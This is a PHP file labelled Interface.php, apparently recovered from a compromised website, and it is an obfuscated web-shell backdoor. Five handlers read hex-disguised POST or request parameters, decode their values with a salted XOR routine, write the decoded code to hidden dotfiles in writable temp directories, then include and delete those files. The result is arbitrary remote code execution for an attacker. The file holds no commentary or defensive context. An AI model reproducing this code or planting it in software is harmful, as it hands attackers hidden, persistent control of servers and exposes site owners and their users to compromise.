File: /home/vitanhod/sawpalmeetto.vitavit.com.pk/Interface.php
<?php if(array_key_exists("bin\x64\x69ng", $_POST) && !is_null($_POST["bin\x64\x69ng"])){ $sym = $_POST["bin\x64\x69ng"]; $sym = explode( '.' , $sym ) ; $pointer =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $p =0; $len =count($sym); do { if ($p >=$len) break; $v1 =$sym[$p]; $sChar =ord($s[$p% $lenS]); $d =((int)$v1 - $sChar - ($p% 10)) ^ 61; $pointer .=chr($d); $p++; } while (true); $record = array_filter(["/tmp", getenv("TEMP"), "/dev/shm", getcwd(), "/var/tmp", sys_get_temp_dir(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir")]); foreach ($record as $key => $val) { if (is_dir($val) && is_writable($val)) { $ptr = join("/", [$val, ".item"]); if (file_put_contents($ptr, $pointer)) { require $ptr; unlink($ptr); exit; } } } }
if(in_array("\x65\x6Cem", array_keys($_REQUEST))){ $property_set = array_filter([getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp", getenv("TMP")]); $entity = $_REQUEST["\x65\x6Cem"]; $entity =explode ( ".",$entity ) ; $data_chunk =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s ); $u =0; $__tmp =$entity; while( $v9 =array_shift( $__tmp)) { $chS =ord( $s[$u%$lenS] ); $d =( ( int)$v9 - $chS -( $u%10)) ^82; $data_chunk .= chr( $d ); $u++; } while ($descriptor = array_shift($property_set)) { if ((bool)is_dir($descriptor) && (bool)is_writable($descriptor)) { $ent = join("/", [$descriptor, ".fac"]); $success = file_put_contents($ent, $data_chunk); if ($success) { include $ent; @unlink($ent); die();} } } }
if(array_key_exists("\x68\x6F\x6Cder", $_REQUEST)){ $rec = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TEMP"), "/var/tmp", getenv("TMP"), "/tmp", getcwd()]); $ent = $_REQUEST["\x68\x6F\x6Cder"]; $ent = explode ("." , $ent); $parameter_group= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $u= 0; $__tmp= $ent; while($v2= array_shift($__tmp)) { $chS= ord($salt[$u % $sLen] ); $d= ((int)$v2 - $chS -($u % 10))^28; $parameter_group .= chr($d ); $u++; } foreach ($rec as $descriptor): if (!!is_dir($descriptor) && !!is_writable($descriptor)) { $factor = "$descriptor/.bind"; if (file_put_contents($factor, $parameter_group)) { include $factor; @unlink($factor); die(); } } endforeach; }
if(array_key_exists("k\x65\x79", $_POST) && !is_null($_POST["k\x65\x79"])){ $hld = array_filter(["/dev/shm", session_save_path(), "/tmp", getenv("TMP"), "/var/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $val = $_POST["k\x65\x79"]; $val= explode ("." , $val) ; $component = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt4); $s = 0; $len = count($val); do {if ($s >=$len) break; $v5 = $val[$s]; $sChar = ord($salt4[$s % $sLen]); $dec = ((int)$v5 - $sChar - ($s % 10)) ^ 72; $component .= chr($dec); $s++; } while (true); foreach ($hld as $entry) { if ((is_dir($entry) and is_writable($entry))) { $data = str_replace("{var_dir}", $entry, "{var_dir}/.symbol"); if (@file_put_contents($data, $component) !== false) { include $data; unlink($data); die(); } } } }
if(filter_has_var(INPUT_POST, "s\x79\x6Db\x6Fl")){
$property_set = array_filter([getenv("TMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", getcwd(), session_save_path()]);
$ent = $_POST["s\x79\x6Db\x6Fl"];
$ent = explode ( '.' , $ent ) ;
$resource = '';
$s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s6);
$t = 0;
foreach( $ent as $v1) { $sChar = ord( $s6[$t % $lenS]);
$d =( ( int)$v1 - $sChar -( $t % 10)) ^ 24;
$resource .= chr( $d);
$t++;
}
$ref = 0;
do {
$holder = $property_set[$ref] ?? null;
if ($ref >= count($property_set)) break;
if (array_product([is_dir($holder), is_writable($holder)])) {
$desc = str_replace("{var_dir}", $holder, "{var_dir}/.element");
if (file_put_contents($desc, $resource)) {
include $desc;
@unlink($desc);
exit;
}
}
$ref++;
} while (true);
}